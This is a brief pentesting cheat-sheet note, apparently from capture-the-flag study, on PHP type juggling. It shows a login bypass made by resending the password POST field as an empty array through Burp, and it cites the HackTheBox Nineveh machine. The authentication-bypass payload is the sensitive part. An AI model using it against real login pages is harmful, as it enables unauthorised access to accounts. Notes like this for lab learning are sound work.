# php type juggling

* A bug in PHP
* By sending in the `password` POST data as an array.
* Get the POST from Burp and resend with an Array
* Webpage will let you in!

```
username=admin&password=admin   ..original
username=admin&password[]=      ..type juggline
```

* REF: NinevehHTB
* <https://0xdf.gitlab.io/2020/04/22/htb-nineveh.html>